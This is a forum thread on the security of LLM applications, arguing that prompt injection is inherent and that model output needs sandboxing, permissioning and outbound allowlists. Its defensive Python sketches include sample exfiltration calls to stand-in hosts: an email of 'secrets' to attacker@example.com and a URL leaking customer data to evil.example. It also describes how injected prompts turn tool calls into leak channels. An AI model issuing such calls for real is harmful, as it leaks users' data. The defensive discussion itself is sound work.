Comment by rdli
Securing LLMs is just structurally different. The attack surface is "the entirety of human written language", which is effectively infinite. We're only now starting to wrap our heads around that.
In general, treating LLM outputs as untrusted (wherever they show up) and enforcing classic cybersecurity guardrails around them (sandboxing, data permissioning, logging) is the current SOTA for mitigation. It'll be interesting to see how approaches evolve as we figure out more.
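For example, a minimal sketch of the permissioning + logging part (nothing here is tied to a real framework; the tools and the allowlist are made up for illustration):

```
import logging

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("llm-gate")

# Hypothetical tool implementations: stand-ins for whatever your app exposes.
def search_docs(query: str) -> str:
    return f"results for {query!r}"

def send_email(to: str, body: str) -> str:
    return f"sent to {to}"

TOOLS = {"search_docs": search_docs, "send_email": send_email}

# Explicit permissioning: which tools the model may invoke at all.
ALLOWED_TOOLS = {"search_docs"}  # send_email deliberately left out

def execute_tool_call(name: str, args: dict) -> str:
    """Run a model-proposed tool call only if policy allows it, and log everything."""
    log.info("model requested tool=%s args=%s", name, args)
    if name not in ALLOWED_TOOLS:
        log.warning("blocked tool call: %s", name)
        return f"ERROR: tool '{name}' is not permitted"
    return TOOLS[name](**args)

print(execute_tool_call("search_docs", {"query": "quarterly report"}))
print(execute_tool_call("send_email", {"to": "attacker@example.com", "body": "secrets"}))
```

The point is just that the decision to actually run anything lives outside the model, where it can be logged and audited.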
I’m not convinced LLMs can ever be secured; prompt injection isn't going away, since it's a fundamental consequence of how an LLM works. Tokens in, tokens out.
It's pretty simple: don't give LLMs access to anything you can't afford to expose. You treat the LLM as if it were the user.
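One way to make "the LLM is the user" concrete (sketch only; `User` and the permission strings are placeholders for whatever your app already has): every tool call runs with the requesting user's own permissions, never with a privileged service account.

```
from dataclasses import dataclass, field

@dataclass
class User:
    name: str
    permissions: set = field(default_factory=set)

def read_record(record_id: str, acting_user: User) -> str:
    # No separate service account for the model: every access is checked
    # against the permissions of the human it is acting for.
    if f"read:{record_id}" not in acting_user.permissions:
        raise PermissionError(f"{acting_user.name} may not read {record_id}")
    return f"contents of {record_id}"

alice = User("alice", {"read:doc-123"})
print(read_record("doc-123", acting_user=alice))   # allowed
# read_record("doc-999", acting_user=alice)        # PermissionError
```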
> You treat the LLM as if it were the user.
That's not sufficient. If a user copies customer data into a public Google Sheet, I can reprimand and otherwise restrict the user. An LLM cannot be held accountable, and cannot learn from mistakes.
I get that, but it's not entirely obvious how you actually do that with Notion AI.
Don't use AI/LLMs that have unfettered access to everything?
Feels like the question is "How do I prevent unauthenticated, anonymous users from using my endpoint that has no authentication and sits on the public internet?", which is the wrong question.
exactly?
It's structurally impossible. LLMs, at their core, take trusted system input (the prompt) and mix it with untrusted input from users and the internet at large in a single token stream. There is no separation between the two, and there cannot be with the way LLMs work. They will always be vulnerable to prompt injection and manipulation.
The _only_ way to create a reasonably secure system that incorporates an LLM is to treat the LLM output as completely untrustworthy in all situations. All interactions must be validated against a security layer, and any calls out of the system must be seen as potential data leaks, including web searches, GET requests, emails, anything.
You can still do useful things under that restriction, but a lot of LLM tooling doesn't seem to grasp the fundamental security issues at play.
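Concretely, here's a rough sketch of the "outbound calls are potential leaks" part, assuming the model can only reach the network through a fetch tool you control (the allowlist is illustrative):

```
from urllib.parse import urlparse

# Outbound destinations we explicitly trust; everything else is treated
# as a potential exfiltration channel.
ALLOWED_HOSTS = {"docs.python.org", "internal-wiki.example"}

def safe_fetch(url: str) -> str:
    host = urlparse(url).hostname or ""
    if host not in ALLOWED_HOSTS:
        # A prompt-injected model can smuggle data out through the URL itself
        # (path or query string), so the request must never be made at all.
        raise ValueError(f"blocked outbound request to {host!r}")
    # ...do the real request here (urllib, requests, etc.)...
    return f"fetched {url}"

print(safe_fetch("https://docs.python.org/3/"))
# safe_fetch("https://evil.example/?leak=CUSTOMER_DATA")  # raises ValueError
```

The same idea applies to email, webhooks, or anything else that crosses the boundary.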
As multi-step reasoning and tool use expand, LLMs effectively become distinct actors in the threat model. We have no idea how many different ways a model's alignment can be influenced by its context (the Anthropic paper on subliminal learning [1] was a bit eye-opening in this regard), and consequently we have no deterministic way to guard against it.
1 - https://alignment.anthropic.com/2025/subliminal-learning/
I’d argue they’re only distinct actors in the threat model as far as where they sit (within which perimeters), not in terms of how they behave.
We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.
Issue is, a lot of LLM security work assumes LLMs function like programs. They don't. They function like humans, but run where programs run.
Dijkstra, On the Foolishness of "natural language programming":
> [...] It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable, [...]
If only we had a way to tell a computer precisely what we want it to do...
https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...